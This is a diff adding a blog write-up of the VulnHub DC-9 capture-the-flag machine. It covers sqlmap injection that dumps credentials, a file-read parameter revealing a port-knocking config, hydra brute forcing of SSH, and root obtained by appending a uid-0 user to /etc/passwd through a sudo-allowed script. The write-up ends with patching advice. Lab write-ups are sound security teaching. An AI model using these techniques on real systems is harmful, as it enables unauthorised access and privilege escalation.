add: writeup-ctf

content/writeup-ctf/writeup-dc-9-vulnhub/index.md

@@ -0,0 +1,135 @@
+---
+title: "Writeup - DC-9 (VulnHub)"
+date: 2022-05-10
+slug: "writeup-dc-9-vulnhub"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [DC-9](https://www.vulnhub.com/entry/dc-9,412/) machine from the VulnHub site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 192.168.56.101
+```
+One TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 80/tcp : HTTP web server (Apache 2.4.38)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by making a scan of the website folders.
+
+![](img/image-3.webp)
+
+Quite a lot of different pages, I start by making a capture of a request sent by the `search.php` page with the help of Burp.
+
+I then run a SQL vulnerability scan with `sqlmap`.
+
+
+```bash
+sqlmap -r request.txt --dbs --batch
+```
+The target is usable, I find 3 databases in the result of the command. I start with `users` :
+
+![](img/image-4.webp)
+
+![](img/image-5.webp)
+
+Many different credentials... Looking in the `Staff` database, I find an admin password hash.
+
+![](img/image-6.webp)
+
+So I go on [crackstation](https://crackstation.net/) to try to find it.
+
+![](img/image-7.webp)
+
+I can now connect to the admin panel of the site. In this panel we have the possibility to add records. I notice that at the bottom of the page `manage.php`, there is an error message : `File does not exist`. I wonder if there is not an argument. After some test I find that there is a `file` argument. This allows me to find the following file:
+
+
+```bash
+File does not exist
+[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn 
+```
+This is a file that allows you to configure port knocking to unblock the SSH port!
+
+So I try to realize the sequence with the following commands:
+
+
+```bash
+nmap -Pn --max-retries 0 -p 7469 192.168.56.101
+nmap -Pn --max-retries 0 -p 8475 192.168.56.101
+nmap -Pn --max-retries 0 -p 9842 192.168.56.101
+```
+And indeed it worked, I now have access to the SSH port:
+
+![](img/image-8.webp)
+
+In the database export, we found a lot of names and passwords. I create two lists and launch an automatic test of the different combinations with `hydra` :
+
+![](img/image-9.webp)
+
+After a few minutes `hydra` finds several combinations that work. It is by connecting as a `janitor` that I finally find an interesting file:
+
+![](img/image-10.webp)
+
+A list of passwords, so I add them to my existing list and I restart `hydra` :
+
+![](img/image-11.webp)
+
+A new combination is found! So I connect in SSH.
+
+## Privilege escalation
+
+I start by checking the sudo permissions of my user.
+
+![](img/image-12.webp)
+
+By executing the script I understand that it uses two arguments: one in reading and the other in writing.
+
+
+```bash
+fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test 
+Usage: python test.py read append
+```
+I will try to add a new admin user to the system. To do this I start by generating a hash+salt with the following command:
+
+
+```bash
+fredf@dc-9:~$ openssl passwd -1 -salt d3vyce azerty
+$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1
+```
+I add the line of my user in a temporary file :
+
+
+```bash
+fredf@dc-9:/opt/devstuff/dist/test$ cat ~/user.txt 
+d3vyce:$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1:0:0:root:/root:/bin/bash
+```
+Then I add my user with the following command:
+
+
+```bash
+sudo ./test ~/user.txt /etc/passwd
+```
+Finally I change user:
+
+![](img/image-13.webp)
+
+I now have a root shell on the machine!
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update the site to avoid SQL injection
+- Do not leave an argument `file` if not used
+- Do not store clear passwords in a database
+- Do not let a script run in root if not necessary